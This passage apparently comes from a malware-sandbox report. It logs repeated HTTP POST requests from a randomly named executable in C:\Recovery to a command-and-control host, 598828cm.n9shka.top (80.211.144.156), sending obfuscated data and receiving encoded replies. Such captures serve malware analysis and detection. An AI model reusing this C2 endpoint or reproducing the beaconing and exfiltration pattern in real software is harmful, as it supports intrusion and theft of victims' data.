                                                    Sep 14, 2024 12:53:37.196922064 CEST1012OUTData Raw: 53 54 5c 58 54 45 5a 5a 5e 5e 56 51 56 59 54 5c 57 5e 5c 5c 57 59 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: ST\XTEZZ^^VQVYT\W^\\WYUZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+/9X0&"$>5#?;$ _&\#()3Q%:-4#!X/&F/%Z-!
                                                    Sep 14, 2024 12:53:37.512213945 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.46279580.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:37.547703981 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:37.900084019 CEST1748OUTData Raw: 56 57 5c 5e 54 45 5f 5c 5e 5e 56 51 56 5f 54 5e 57 57 5c 5a 57 59 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VW\^TE_\^^VQV_T^WW\ZWYU[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?/)_&.=!'=..Z"Y(082+[<:/2=! *;,&F/%Z-9
                                                    Sep 14, 2024 12:53:38.221062899 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:38.350033045 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 5e 29 1a 2c 13 23 14 0d 0a 3f 2f 04 58 2a 1c 21 04 29 2c 0a 03 29 24 3d 5c 2a 13 33 51 26 3f 30 16 26 31 22 06 27 19 2f 57 36 2b 2e 5a 0c 1d 23 5b 20 33 3a 10 31 28 26 59 24 08 36 5f 34 31 3b 5f 26 38 3d 5a 22 2f 2a 12 28 06 22 0b 2a 1f 2a 0f 29 04 2e 42 2f 2d 3a 52 20 02 23 51 00 10 26 1a 32 58 21 59 36 37 26 0c 29 31 3d 5a 25 0b 3d 0e 33 5d 36 1f 26 06 22 07 27 0a 2f 58 36 0b 2f 5c 27 3c 20 05 23 20 3d 57 2b 2e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #^),#?/X*!),)$=\*3Q&?0&1"'/W6+.Z#[ 3:1(&Y$6_41;_&8=Z"/*("**).B/-:R #Q&2X!Y67&)1=Z%=3]6&"'/X6/\'< # =W+.#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.46279680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:37.673418999 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:38.024888992 CEST1012OUTData Raw: 56 52 5c 5e 54 44 5f 58 5e 5e 56 51 56 5d 54 5a 57 50 5c 54 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VR\^TD_X^^VQV]TZWP\TWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,$.&#7*[1"'(41\,+2*X43!8&F/%Z-1
                                                    Sep 14, 2024 12:53:38.356945038 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:38.547240973 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.46279780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:38.696543932 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:39.040514946 CEST1012OUTData Raw: 56 55 59 59 54 46 5f 59 5e 5e 56 51 56 58 54 52 57 57 5c 59 57 50 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VUYYTF_Y^^VQVXTRWW\YWPUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<=$.=!=65<#'; _':7^()&\70*;<&F/%Z-%
                                                    Sep 14, 2024 12:53:39.389436960 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:39.529771090 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.46279880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:39.660656929 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:40.009265900 CEST1012OUTData Raw: 53 50 5c 5c 54 40 5a 58 5e 5e 56 51 56 5c 54 5f 57 53 5c 59 57 5c 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SP\\T@ZX^^VQV\T_WS\YW\U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(<[&-2"7#>*\5<8X382_+:/Q1:"406,&F/%Z-
                                                    Sep 14, 2024 12:53:40.335196972 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:40.465967894 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.46279980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:40.591701984 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:40.946825027 CEST1012OUTData Raw: 56 53 59 5a 54 41 5f 5f 5e 5e 56 51 56 53 54 5f 57 53 5c 5a 57 5b 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYZTA__^^VQVST_WS\ZW[U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+<'.*57#>]"?8\3%\4??%=]4 */&F/%Z-
                                                    Sep 14, 2024 12:53:41.275418997 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:41.478303909 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.46280080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:41.606794119 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:41.962397099 CEST1012OUTData Raw: 53 57 5c 5f 54 42 5f 5c 5e 5e 56 51 56 5e 54 5b 57 55 5c 5a 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SW\_TB_\^^VQV^T[WU\ZWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+Y0-54$Y>*5?08\23+:+V%>#*/,&F/%Z-=
                                                    Sep 14, 2024 12:53:42.278722048 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:42.409252882 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.46280180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:42.592494011 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:42.946770906 CEST1012OUTData Raw: 56 53 5c 58 51 46 5a 5c 5e 5e 56 51 56 52 54 5b 57 55 5c 58 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\XQFZ\^^VQVRT[WU\XWYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,5^&.67(=.2"Y;3 X%'_?)3')=^#:;,&F/%Z-
                                                    Sep 14, 2024 12:53:43.258702040 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.46280280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:43.359333038 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1724
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:43.712502003 CEST1724OUTData Raw: 53 57 5c 5b 54 48 5a 5b 5e 5e 56 51 56 5f 54 53 57 5f 5c 5f 57 5c 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SW\[THZ[^^VQV_TSW_\_W\U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(Z%['=-!8Z(>=5Y'$8\%:+9/Q19)^!0!X/,&F/%Z-9
                                                    Sep 14, 2024 12:53:44.051898956 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:44.187567949 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 07 3e 1d 30 5f 22 3a 2b 09 2b 2f 36 5e 3d 31 25 01 2a 12 33 5a 28 34 22 03 2a 2e 30 0f 27 2c 2b 06 27 1f 26 00 27 34 30 0f 22 11 2e 5a 0c 1d 23 11 23 0d 0b 04 32 01 31 00 24 1f 3e 5c 23 22 11 16 25 2b 3d 5c 21 06 25 01 28 06 22 09 2a 31 22 0c 28 3e 2e 09 2c 04 2a 14 37 12 23 51 00 10 26 55 26 3e 3e 03 35 37 3d 56 2a 08 25 59 25 36 21 0f 27 15 26 5c 31 06 21 1b 24 0a 30 04 35 21 27 12 24 3c 2b 1a 20 30 22 0f 28 14 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: >0_":++/6^=1%*3Z(4"*.0',+'&'40".Z##21$>\#"%+=\!%("*1"(>.,*7#Q&U&>>57=V*%Y%6!'&\1!$05!'$<+ 0"(#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.46280380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:43.492957115 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:43.837371111 CEST1012OUTData Raw: 53 53 59 5b 51 41 5a 5c 5e 5e 56 51 56 59 54 58 57 53 5c 59 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SSY[QAZ\^^VQVYTXWS\YW]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+0.64 ]>=>"Y''8<\&<?)/Q&* ;&F/%Z-!
                                                    Sep 14, 2024 12:53:44.181045055 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:44.312381029 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.46280480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:44.447617054 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:44.807044983 CEST1012OUTData Raw: 56 54 59 59 51 41 5a 5b 5e 5e 56 51 56 58 54 58 57 55 5c 59 57 58 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VTYYQAZ[^^VQVXTXWU\YWXUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(<:&>"V644Z>5< 38(&\4+9#Q%^40"8<&F/%Z-%
                                                    Sep 14, 2024 12:53:45.131305933 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:45.264112949 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.46280580.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:45.392992020 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:45.743783951 CEST1012OUTData Raw: 53 50 5c 58 51 43 5a 5c 5e 5e 56 51 56 52 54 53 57 57 5c 5f 57 59 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SP\XQCZ\^^VQVRTSWW\_WYU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z*?5_$=>5Q((>6"?#%(;%:'^(Q1%Y73).<&F/%Z-
                                                    Sep 14, 2024 12:53:46.057602882 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:46.188416958 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.46280680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:46.315531015 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:46.665599108 CEST1012OUTData Raw: 56 51 59 58 51 43 5f 59 5e 5e 56 51 56 5e 54 52 57 54 5c 5c 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQYXQC_Y^^VQV^TRWT\\WYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+!X&.2W"$4\=-"[6, ]';+1+X*)0'9*73Y;<&F/%Z-=
                                                    Sep 14, 2024 12:53:46.988356113 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:47.118244886 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.46280780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:47.263241053 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:47.618690014 CEST1012OUTData Raw: 56 54 5c 58 54 46 5a 5e 5e 5e 56 51 56 58 54 5c 57 5e 5c 5a 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VT\XTFZ^^^VQVXT\W^\ZW]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y<<^'X9"$<Y*[-#/'3,X%*<(92%7),<&F/%Z-%
                                                    Sep 14, 2024 12:53:47.931679010 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:48.064486027 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:47 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.46280880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:48.194093943 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
